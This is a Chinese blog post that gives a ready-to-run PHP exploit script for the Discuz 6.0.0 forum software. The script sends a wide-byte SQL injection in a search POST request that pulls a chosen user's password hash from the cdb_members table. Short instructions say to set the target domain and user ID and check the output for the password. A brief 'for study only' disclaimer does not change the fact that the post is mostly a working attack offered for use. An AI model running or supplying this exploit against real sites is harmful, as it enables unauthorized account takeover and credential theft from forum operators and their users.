杜工版discuz6.0.0漏洞利用脚本 | 71街

Home > 感悟 > 杜工版discuz6.0.0漏洞利用脚本

杜工版discuz6.0.0漏洞利用脚本0+

22,461 views / 2013.08.18 / 3:03 下午

杜工版discuz6.0.0漏洞利用脚本
学习研究技术用,切勿用于非法用途
修改域名和要破解的用户uid后,运行查看输出内容中是否有密码,如果没有说明论坛漏洞已经被修复
代码如下:

error_reporting(E_ALL&E_NOTICE);
/*杜工版discuz6.0.0漏洞利用脚本*/
/*学习研究技术用,切勿用于非法用途*/
$host = "www.xxx.com";
$path = "forum/";
$port = 80;
$uid = 1;
$content = "action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" . $uid . "/*&do=submit";

$data = "POST /" . $path . "/index.php" . " HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: wap\r\n";
$data .= "Host: " . $host . "\r\n";
$data .= "Content-length: " . strlen($content) . "\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $content . "\r\n\r\n";
$ock = fsockopen($host, $port);
if (!$ock) {
	echo 'No response from ' . $host . "\n";;
	die;
} 
fwrite($ock, $data);
while (!feof($ock)) {
	echo fgets($ock, 1024);
}
本站内容受著作权法保护。个人 blog 转载时请遵循 “署名-非商业用途-保持一致” 的创作共用协议;商业网站或未授权媒体不得复制本站内容。
Categories: 感悟 Tags:

Comments (0) Trackbacks (0) 本篇共有 0 篇评论↓
  1. No comments yet.
  1. No trackbacks yet.